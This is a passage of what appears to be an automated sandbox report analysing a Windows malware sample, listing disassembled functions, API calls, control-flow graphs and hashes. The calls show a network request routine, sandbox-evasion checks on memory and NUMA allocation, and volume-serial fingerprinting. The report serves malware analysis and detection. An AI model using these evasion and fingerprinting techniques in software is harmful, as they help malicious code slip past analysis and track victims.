                                • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                                • String ID: ERROR$GET
                                • API String ID: 3687753495-3591763792
                                • Opcode ID: cff0f6383da3cedc163aaf6d1bb836b10615fcf10c6f823a3e3bc43668f2f9f0
                                • Instruction ID: 1e2ca7b7d05e6a7505d8250f130e15e25e73fc0d0acc35fad3319665fea7e7c0
                                • Opcode Fuzzy Hash: cff0f6383da3cedc163aaf6d1bb836b10615fcf10c6f823a3e3bc43668f2f9f0
                                • Instruction Fuzzy Hash: 2C818271A41215ABEB20DFA4DD89FEE77B9EF44720F144068F909EB281DB74ED048B90
                                Function 009CF2F8 Relevance: 30.1, APIs: 16, Strings: 1, Instructions: 391stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(010B55D0), ref: 009CF315
                                • lstrcpy.KERNEL32(00000000,?), ref: 009CF3A3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009CF3C7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009CF47B
                                • lstrcpy.KERNEL32(00000000,010B55D0), ref: 009CF4BB
                                • lstrcpy.KERNEL32(00000000,010C8AC8), ref: 009CF4EA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009CF59E
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 009CF61C
                                • lstrcpy.KERNEL32(00000000,?), ref: 009CF64C
                                • lstrcpy.KERNEL32(00000000,?), ref: 009CF69A
                                • StrCmpCA.SHLWAPI(?,ERROR), ref: 009CF718
                                • lstrlen.KERNEL32(010C8C58), ref: 009CF746
                                • lstrcpy.KERNEL32(00000000,010C8C58), ref: 009CF771
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009CF793
                                • lstrcpy.KERNEL32(00000000,?), ref: 009CF7E4
                                • StrCmpCA.SHLWAPI(?,ERROR), ref: 009CFA32
                                • lstrlen.KERNEL32(010C8C78), ref: 009CFA60
                                • lstrcpy.KERNEL32(00000000,010C8C78), ref: 009CFA8B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009CFAAD
                                • lstrcpy.KERNEL32(00000000,?), ref: 009CFAFE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID: ERROR
                                • API String ID: 367037083-2861137601
                                • Opcode ID: c06219b84561e068367b708a6ac08be9e9de5e6d7238ce538b577690f3fc77dd
                                • Instruction ID: 7c01c7b33b6c4bc0600a2b5482500d2bf4ca0cccf3b0c61f8a30203055ee8da6
                                • Opcode Fuzzy Hash: c06219b84561e068367b708a6ac08be9e9de5e6d7238ce538b577690f3fc77dd
                                • Instruction Fuzzy Hash: 17F14D30E01642DFDB24CF69C9A8B55B7EABF44314B1980BED4099B3A1EB35DC46CB52
                                Function 009C8CA0 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 176COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2721 9c8ca0-9c8cc4 StrCmpCA 2722 9c8ccd-9c8ce6 2721->2722 2723 9c8cc6-9c8cc7 ExitProcess 2721->2723 2725 9c8cec-9c8cf1 2722->2725 2726 9c8ee2-9c8eef call 9b2a20 2722->2726 2728 9c8cf6-9c8cf9 2725->2728 2730 9c8cff 2728->2730 2731 9c8ec3-9c8edc 2728->2731 2732 9c8dbd-9c8dcb StrCmpCA 2730->2732 2733 9c8ddd-9c8deb StrCmpCA 2730->2733 2734 9c8dfd-9c8e0b StrCmpCA 2730->2734 2735 9c8e1d-9c8e2b StrCmpCA 2730->2735 2736 9c8e3d-9c8e4b StrCmpCA 2730->2736 2737 9c8d5a-9c8d69 lstrlen 2730->2737 2738 9c8e56-9c8e64 StrCmpCA 2730->2738 2739 9c8d30-9c8d3f lstrlen 2730->2739 2740 9c8e6f-9c8e7d StrCmpCA 2730->2740 2741 9c8e88-9c8e9a lstrlen 2730->2741 2742 9c8d84-9c8d92 StrCmpCA 2730->2742 2743 9c8da4-9c8db8 StrCmpCA 2730->2743 2744 9c8d06-9c8d15 lstrlen 2730->2744 2731->2726 2770 9c8cf3 2731->2770 2732->2731 2758 9c8dd1-9c8dd8 2732->2758 2733->2731 2759 9c8df1-9c8df8 2733->2759 2734->2731 2760 9c8e11-9c8e18 2734->2760 2735->2731 2761 9c8e31-9c8e38 2735->2761 2736->2731 2745 9c8e4d-9c8e54 2736->2745 2754 9c8d6b-9c8d70 call 9b2a20 2737->2754 2755 9c8d73-9c8d7f call 9b2930 2737->2755 2738->2731 2748 9c8e66-9c8e6d 2738->2748 2752 9c8d49-9c8d55 call 9b2930 2739->2752 2753 9c8d41-9c8d46 call 9b2a20 2739->2753 2740->2731 2749 9c8e7f-9c8e86 2740->2749 2750 9c8e9c-9c8ea1 call 9b2a20 2741->2750 2751 9c8ea4-9c8eb0 call 9b2930 2741->2751 2742->2731 2757 9c8d98-9c8d9f 2742->2757 2743->2731 2746 9c8d1f-9c8d2b call 9b2930 2744->2746 2747 9c8d17-9c8d1c call 9b2a20 2744->2747 2745->2731 2779 9c8eb3-9c8eb5 2746->2779 2747->2746 2748->2731 2749->2731 2750->2751 2751->2779 2752->2779 2753->2752 2754->2755 2755->2779 2757->2731 2758->2731 2759->2731 2760->2731 2761->2731 2770->2728 2779->2731 2780 9c8eb7-9c8eb9 2779->2780 2780->2731 2781 9c8ebb-9c8ebd lstrcpy 2780->2781 2781->2731
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess
                                • String ID: block
                                • API String ID: 621844428-2199623458
                                • Opcode ID: 728fe1697d6b1a892ff57fc36b1364ea1a6fdab979712c61226b1c1d2007995b
                                • Instruction ID: 92e78b1889f395d017b2c0a1e8556ccea0305c674e869244422ad38cb34e2e3a
                                • Opcode Fuzzy Hash: 728fe1697d6b1a892ff57fc36b1364ea1a6fdab979712c61226b1c1d2007995b
                                • Instruction Fuzzy Hash: 77516830E04641ABCB21AF65DA89F6B7BE8BB84704B104C6DE482D7651DB78E8458B22
                                Function 009D2740 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 93memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2782 9d2740-9d2783 GetWindowsDirectoryA 2783 9d278c-9d27ea GetVolumeInformationA 2782->2783 2784 9d2785 2782->2784 2785 9d27ec-9d27f2 2783->2785 2784->2783 2786 9d2809-9d2820 GetProcessHeap RtlAllocateHeap 2785->2786 2787 9d27f4-9d2807 2785->2787 2788 9d2826-9d2844 wsprintfA 2786->2788 2789 9d2822-9d2824 2786->2789 2787->2785 2790 9d285b-9d2872 call 9d71e0 2788->2790 2789->2790
                                APIs
                                • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 009D277B
                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,009C93B6,00000000,00000000,00000000,00000000), ref: 009D27AC
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009D280F
                                • RtlAllocateHeap.NTDLL(00000000), ref: 009D2816
                                • wsprintfA.USER32 ref: 009D283B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                                • String ID: :\$C
                                • API String ID: 2572753744-3309953409
                                • Opcode ID: ca7af9848235468fa0efc8c8bb03ac8c901661f4593628896bbb9afe8c907bd3
                                • Instruction ID: fab312ba9725d79286026171c82a293ba48875ff4d0dfa08c5514f52cc505de1
                                • Opcode Fuzzy Hash: ca7af9848235468fa0efc8c8bb03ac8c901661f4593628896bbb9afe8c907bd3
                                • Instruction Fuzzy Hash: 2B3150B1D482499BCB14CFB88A85AEFFFBCEF58710F10416AE505F7650E6749A408BA1
                                Function 009B4BC0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50stringnetworkCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2793 9b4bc0-9b4bce 2794 9b4bd0-9b4bd5 2793->2794 2794->2794 2795 9b4bd7-9b4c48 ??2@YAPAXI@Z * 3 lstrlen InternetCrackUrlA call 9b2a20 2794->2795
                                APIs
                                • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 009B4BF7
                                • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 009B4C01
                                • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 009B4C0B
                                • lstrlen.KERNEL32(?,00000000,?), ref: 009B4C1F
                                • InternetCrackUrlA.WININET(?,00000000), ref: 009B4C27
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ??2@$CrackInternetlstrlen
                                • String ID: <
                                • API String ID: 1683549937-4251816714
                                • Opcode ID: 991cbf26df40cd068ec95307edb54b242889632e49d6566d0e8e6dadad641802
                                • Instruction ID: 25102cb3d771fdad6cb3b551db331700a8407a5aed353dd82bff4926af7e3950
                                • Opcode Fuzzy Hash: 991cbf26df40cd068ec95307edb54b242889632e49d6566d0e8e6dadad641802
                                • Instruction Fuzzy Hash: 42012D71D00218ABDB10DFA8EC45B9EBBB8EB48320F004566F918E7390DF7459048FD4
                                Function 009B1030 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2798 9b1030-9b1055 GetCurrentProcess VirtualAllocExNuma 2799 9b105e-9b107b VirtualAlloc 2798->2799 2800 9b1057-9b1058 ExitProcess 2798->2800 2801 9b107d-9b1080 2799->2801 2802 9b1082-9b1088 2799->2802 2801->2802 2803 9b108a-9b10ab VirtualFree 2802->2803 2804 9b10b1-9b10b6 2802->2804 2803->2804
                                APIs
                                • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 009B1046
                                • VirtualAllocExNuma.KERNEL32(00000000), ref: 009B104D
                                • ExitProcess.KERNEL32 ref: 009B1058
                                • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 009B106C
                                • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 009B10AB
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                                • String ID:
                                • API String ID: 3477276466-0
                                • Opcode ID: b5d0ad0769be4dfd098e7c3ac3f24a947bfd5399a666ba16a3825ea7bbfb516e
                                • Instruction ID: 28a6016224952dc7dd6b6e30859fa8acb687d05d07c2c7221737d0b16ab4535d
                                • Opcode Fuzzy Hash: b5d0ad0769be4dfd098e7c3ac3f24a947bfd5399a666ba16a3825ea7bbfb516e
                                • Instruction Fuzzy Hash: 2301F4717402447BE7205A656CAAFAB77ADA784B11F608414F708EB2C0DEB1EA048664
                                Function 009CEE90 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2805 9cee90-9ceeb5 call 9b2930 2808 9ceec9-9ceecd call 9b6c40 2805->2808 2809 9ceeb7-9ceebf 2805->2809 2812 9ceed2-9ceee8 StrCmpCA 2808->2812 2809->2808 2810 9ceec1-9ceec3 lstrcpy 2809->2810 2810->2808 2813 9ceeea-9cef02 call 9b2a20 call 9b2930 2812->2813 2814 9cef11-9cef18 call 9b2a20 2812->2814 2823 9cef04-9cef0c 2813->2823 2824 9cef45-9cefa0 call 9b2a20 * 10 2813->2824 2820 9cef20-9cef28 2814->2820 2820->2820 2822 9cef2a-9cef37 call 9b2930 2820->2822 2822->2824 2831 9cef39 2822->2831 2823->2824 2827 9cef0e-9cef0f 2823->2827 2830 9cef3e-9cef3f lstrcpy 2827->2830 2830->2824 2831->2830
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 009CEEC3
                                • StrCmpCA.SHLWAPI(?,ERROR), ref: 009CEEDE
                                • lstrcpy.KERNEL32(00000000,ERROR), ref: 009CEF3F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID: ERROR
                                • API String ID: 3722407311-2861137601
                                • Opcode ID: acd129621106f6338a174f44fab3f923068f088758ca763088f4cfe9c389175b
                                • Instruction ID: 5ad79d1c24d9d615b5f64690add16f9c77e0a426e05c8e9ec11429c3f002393a
                                • Opcode Fuzzy Hash: acd129621106f6338a174f44fab3f923068f088758ca763088f4cfe9c389175b
                                • Instruction Fuzzy Hash: F021F171A202469BCB21FFB9DE46BDE77A4EF54310F04546CB84AEB252DA34EC148791
                                Function 009B10C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2886 9b10c0-9b10cb 2887 9b10d0-9b10dc 2886->2887 2889 9b10de-9b10f3 GlobalMemoryStatusEx 2887->2889 2890 9b1112-9b1114 ExitProcess 2889->2890 2891 9b10f5-9b1106 2889->2891 2892 9b111a-9b111d 2891->2892 2893 9b1108 2891->2893 2893->2890 2894 9b110a-9b1110 2893->2894 2894->2890 2894->2892
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitGlobalMemoryProcessStatus
                                • String ID: @
                                • API String ID: 803317263-2766056989
                                • Opcode ID: 91786ae3750eda42167b49682ff3620b6344a79864f473857b4d80068d2047bb
                                • Instruction ID: 2e171e7efdea00f9ec6c61de798ebaaedb688623ebf9fd2f48b816e635954ad0
                                • Opcode Fuzzy Hash: 91786ae3750eda42167b49682ff3620b6344a79864f473857b4d80068d2047bb
                                • Instruction Fuzzy Hash: EAF0277010C2895BEB18BA68DA6A3BDF7DCEB00370FA00929DE9AC3181E630C8508527
                                Function 009C8C8A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2895 9c8c8a-9c8cc4 StrCmpCA 2897 9c8ccd-9c8ce6 2895->2897 2898 9c8cc6-9c8cc7 ExitProcess 2895->2898 2900 9c8cec-9c8cf1 2897->2900 2901 9c8ee2-9c8eef call 9b2a20 2897->2901 2903 9c8cf6-9c8cf9 2900->2903 2905 9c8cff 2903->2905 2906 9c8ec3-9c8edc 2903->2906 2907 9c8dbd-9c8dcb StrCmpCA 2905->2907 2908 9c8ddd-9c8deb StrCmpCA 2905->2908 2909 9c8dfd-9c8e0b StrCmpCA 2905->2909 2910 9c8e1d-9c8e2b StrCmpCA 2905->2910 2911 9c8e3d-9c8e4b StrCmpCA 2905->2911 2912 9c8d5a-9c8d69 lstrlen 2905->2912 2913 9c8e56-9c8e64 StrCmpCA 2905->2913 2914 9c8d30-9c8d3f lstrlen 2905->2914 2915 9c8e6f-9c8e7d StrCmpCA 2905->2915 2916 9c8e88-9c8e9a lstrlen 2905->2916 2917 9c8d84-9c8d92 StrCmpCA 2905->2917 2918 9c8da4-9c8db8 StrCmpCA 2905->2918 2919 9c8d06-9c8d15 lstrlen 2905->2919 2906->2901 2945 9c8cf3 2906->2945 2907->2906 2933 9c8dd1-9c8dd8 2907->2933 2908->2906 2934 9c8df1-9c8df8 2908->2934 2909->2906 2935 9c8e11-9c8e18 2909->2935 2910->2906 2936 9c8e31-9c8e38 2910->2936 2911->2906 2920 9c8e4d-9c8e54 2911->2920 2929 9c8d6b-9c8d70 call 9b2a20 2912->2929 2930 9c8d73-9c8d7f call 9b2930 2912->2930 2913->2906 2923 9c8e66-9c8e6d 2913->2923 2927 9c8d49-9c8d55 call 9b2930 2914->2927 2928 9c8d41-9c8d46 call 9b2a20 2914->2928 2915->2906 2924 9c8e7f-9c8e86 2915->2924 2925 9c8e9c-9c8ea1 call 9b2a20 2916->2925 2926 9c8ea4-9c8eb0 call 9b2930 2916->2926 2917->2906 2932 9c8d98-9c8d9f 2917->2932 2918->2906 2921 9c8d1f-9c8d2b call 9b2930 2919->2921 2922 9c8d17-9c8d1c call 9b2a20 2919->2922 